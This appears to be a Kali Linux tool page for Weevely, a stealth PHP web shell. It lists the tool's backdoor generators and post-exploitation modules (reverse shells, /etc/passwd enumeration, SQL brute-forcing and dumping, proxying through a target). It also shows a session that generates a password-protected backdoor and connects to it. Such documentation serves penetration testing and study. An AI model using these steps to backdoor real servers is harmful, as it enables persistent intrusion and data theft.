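Weevely Package Description
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.
Source: https://github.com/epinna/Weevely/
Weevely Homepage | Kali Weevely Repo
- Author: Weevely Developers
- License: GPLv2
Tools included in the weevely package
weevely - Stealth tiny web shell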
[email protected]:~# weevely help
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+------------------------------------------------------------------------------+
| module | description |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles | Find wrong system files permissions |
| :audit.userfiles | Guess files with wrong permissions in users home folders |
| :audit.mapwebfiles | Crawl and enumerate web folders files permissions |
| :audit.phpconf | Check php security configurations |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :shell.sh | Execute system shell command |
| :shell.php | Execute PHP statement |
| :system.info | Collect system informations |
| :find.name | Find files with matching name |
| :find.perms | Find files with write, read, execute permissions |
| :find.suidsgid | Find files with superuser flags |
| :backdoor.reversetcp | Send reverse TCP shell |
| :backdoor.tcp | Open a shell on TCP port |
| :bruteforce.sql | Bruteforce SQL username |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :file.read | Read remote file |
| :file.webdownload | Download web URL to remote filesystem |
| :file.mount | Mount remote filesystem using HTTPfs |
| :file.enum | Enumerate remote paths |
| :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :file.ls | List directory contents |
| :file.touch | Change file timestamps |
| :file.download | Download binary/ascii files from the remote filesystem |
| :file.upload | Upload binary/ascii file into remote filesystem |
| :file.edit | Edit remote file |
| :sql.console | Run SQL console or execute single queries |
| :sql.dump | Get SQL database dump |
| :net.ifaces | Print interfaces addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.phpproxy | Install remote PHP proxy |
| :net.scan | Port scan open TCP ports |
+----------------------+------------------------------------------------------------------------------+
Hint: Run ':help <module>' to print detailed usage informations.
weevely Usage Example
Generate a PHP backdoor (generate) protected with the given password (s3cr3t).
[email protected]:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'
[email protected]:~# weevely http://192.168.1.202/weevely.php s3cr3t
________ __
| | | |----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|____|____|___/|____|__|___ | v1.1
|_____|
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'
[email protected]:/var/www $ uname
Linux
[email protected]:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)